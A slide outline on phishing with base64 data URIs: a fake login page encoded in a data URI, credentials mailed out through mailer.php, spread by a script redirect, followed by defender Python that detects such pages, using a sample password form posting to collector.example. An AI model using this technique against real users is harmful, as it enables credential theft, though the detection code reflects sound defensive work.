Phishing With Data URI

New way of phishing with Data URI

Published in: Education

  1. DATA URI
     • The data URI scheme is a URI scheme (Uniform Resource Identifier scheme) that provides a way to include data in-line in web pages as if they were external resources.
     • More info: http://en.wikipedia.org/wiki/Data_URI_scheme
  2. PHISHING OLD METHOD
     • Diagram labels: FAKE URL, login.php, Logs.txt (Username: poorguy@gmail.com, Password: strong p@ssw0rd)
     • All these are hosted under a website.
  3. Phishing with Data URI
     • Diagram labels: Hyperlink / Redirect, mailer.php
     • This fake page is not hosted anywhere. It's made up of DATA URI, Base64 encoded data.
     • Mails the hacker the stolen username and password.
  4. Diagram labels: Source code, Modified source code, Base64 encoded
     • Modification: send the username and password logged to a PHP file which may mail/log it.
  5. DATA URI PHISHING
     • data:text/html;base64, PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=
     • Spreading: <script>window.location ="data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="</script>
  6. Limitations
     • Difficult to inject JavaScript in websites.
     • Internet Explorer won’t support Data URI
  7. DEMO
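
A defender-side check for the pattern on slides 3 to 5, added here as an example (not from the original slides): it finds base64 text/html data URIs in a message or page, decodes them, and flags decoded pages that combine a password field with a form posting to an absolute URL. The function names and the collector.example sample form are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from html.parser import HTMLParser

# data:text/html;base64,<payload>; allows ;charset=... and a space after the comma.
DATA_URI_RE = re.compile(
    r"data:text/html(?:;[\w.+-]+=[\w.+-]+)*;base64,\s*([A-Za-z0-9+/]+={0,2})",
    re.IGNORECASE)

class _FormScan(HTMLParser):
    """Collects form targets, password fields and script tags from decoded HTML."""
    def __init__(self):
        super().__init__()
        self.form_actions, self.password_fields, self.scripts = [], 0, 0
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        elif tag == "script":
            self.scripts += 1

def scan_for_data_uri_pages(text):
    """Return one finding per base64 text/html data URI embedded in text."""
    findings = []
    for m in DATA_URI_RE.finditer(text):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except (binascii.Error, ValueError):
            continue  # malformed base64: not a loadable page
        html = raw.decode("utf-8", "replace")
        scan = _FormScan()
        scan.feed(html)
        # A data: URL has no server to resolve relative paths, so forms post to absolute URLs.
        remote = [x for x in scan.form_actions if re.match(r"(?i)(https?:)?//", x)]
        findings.append({
            "decoded": html,
            "scripts": scan.scripts,
            "password_fields": scan.password_fields,
            "remote_form_actions": remote,
            "credential_harvest": bool(scan.password_fields and remote),
        })
    return findings
# Constructed samples: the slide's redirect string and a minimal login form.
SLIDE_SAMPLE = '<script>window.location ="data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="</script>'
FORM_HTML = '<form action="http://collector.example/mailer.php"><input type="password" name="p"></form>'
FORM_SAMPLE = '<a href="data:text/html;base64,' + base64.b64encode(FORM_HTML.encode()).decode() + '">Sign in</a>'
```

Run over mail bodies or proxy-logged pages, a finding with `credential_harvest` set is the case worth alerting on; the slide's own sample decodes to a script-only page and is reported without that flag.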